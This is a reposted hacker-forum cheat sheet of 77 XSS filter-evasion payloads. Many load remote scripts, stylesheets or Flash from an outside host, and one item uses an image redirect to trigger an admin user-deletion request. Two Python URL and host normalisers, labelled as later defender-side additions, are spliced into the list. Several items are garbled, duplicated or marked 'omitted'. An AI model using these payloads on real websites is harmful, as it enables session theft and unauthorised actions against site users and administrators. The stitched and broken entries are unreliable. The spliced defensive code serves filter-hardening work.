There seems to be rather little XSS material on t00ls, so I copied over some good stuff I saw; not sure whether anyone needs to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically have no effect in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters in front of the JavaScript
<IMG SRC=" javascript:alert('XSS');">
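Added here as a defender-side check, not code from the original post: a Python normaliser that applies the decodings behind items (3) to (19) (entity decoding with or without the semicolon, removal of tab/CR/LF/NUL and leading spaces, case folding) before deciding whether an attribute value carries a script URL. The Unicode space list is an assumption taken from item (47) (U+00A0, U+2000 to U+200B, U+3000, U+FEFF).

```python
import html
import re

# Characters a browser discards while reading a URL scheme: C0 controls,
# space, DEL, and the Unicode spaces referred to in item (47) (assumed here
# to be U+00A0, U+2000..U+200B, U+3000 and U+FEFF).
_SCHEME_NOISE = re.compile(r"[\x00-\x20\x7f\xa0\u2000-\u200b\u3000\ufeff]")
_SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")


def canonical_scheme(value: str) -> str:
    """Return the lower-cased scheme (with ':') a browser would see for VALUE,
    or '' when there is no scheme at all (relative and protocol-relative URLs).

    Decodes in the order a browser does: entity references with or without
    a trailing ';' (HTML parsing), then control/whitespace removal and case
    folding (URL parsing). Only the part before the first ':' is examined.
    """
    text = html.unescape(value)          # &#106;avascript, &#x6A;avascript, &#106avascript
    text = _SCHEME_NOISE.sub("", text)   # jav<TAB>ascript, java<NUL>script, "   javascript"
    scheme, sep, _rest = text.partition(":")
    return scheme.lower() + sep if sep else ""


def is_script_url(value: str) -> bool:
    """True when a SRC/HREF/BACKGROUND-style attribute value would run script."""
    return canonical_scheme(value) in _SCRIPT_SCHEMES
```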
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS (trailing dot)
<A HREF="http://www.google.com./">XSS</A>
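Added here as a defender-side example, not code from the original post: a Python host canonicaliser that collapses the address spellings in items (70) to (76) (plain decimal, hex parts, octal parts, mixed bases, a trailing dot) to one dotted-decimal form so that an allowlist or redirect check compares a single representation. It assumes the classic inet_aton rules: up to four parts, and the last part fills all remaining bytes.

```python
import ipaddress


def _parse_part(p: str) -> int:
    """Parse one dotted-host part the way inet_aton does: 0x = hex, leading 0 = octal."""
    if p.startswith("0x"):
        digits, base = p[2:], 16
    elif len(p) > 1 and p.startswith("0"):
        digits, base = p, 8
    else:
        digits, base = p, 10
    if not digits or not digits.isalnum() or not digits.isascii():
        raise ValueError(p)          # rejects '', '+1', '1_0', ' 1'
    return int(digits, base)         # raises ValueError on non-digits for the base


def canonical_host(host: str) -> str:
    """Return the dotted-decimal form when HOST is a numeric IPv4 spelling.

    Covers items (70) to (76): 3232235521, 0xc0.0xa8.0x00.0x01,
    0300.0250.0000.0001, 66.000146.0x7.147, and a trailing dot.  Anything
    that is not a numeric address is returned lower-cased with the trailing
    dot removed, so 'www.google.com.' and 'WWW.google.com' compare equal.
    """
    host = host.strip().lower().rstrip(".")
    parts = host.split(".")
    if len(parts) > 4:
        return host
    try:
        values = [_parse_part(p) for p in parts]
    except ValueError:
        return host
    n = 0
    for v in values[:-1]:            # leading parts are single octets
        if v > 0xFF:
            return host
        n = (n << 8) | v
    tail_bits = 8 * (4 - len(values) + 1)   # last part fills the remaining bytes
    if values[-1] >= 1 << tail_bits:
        return host
    return str(ipaddress.IPv4Address((n << tail_bits) | values[-1]))
```

The two-part form (192.11010049) is handled as well, which the page does not list; it is the same inet_aton rule applied with a 24-bit tail.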
(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14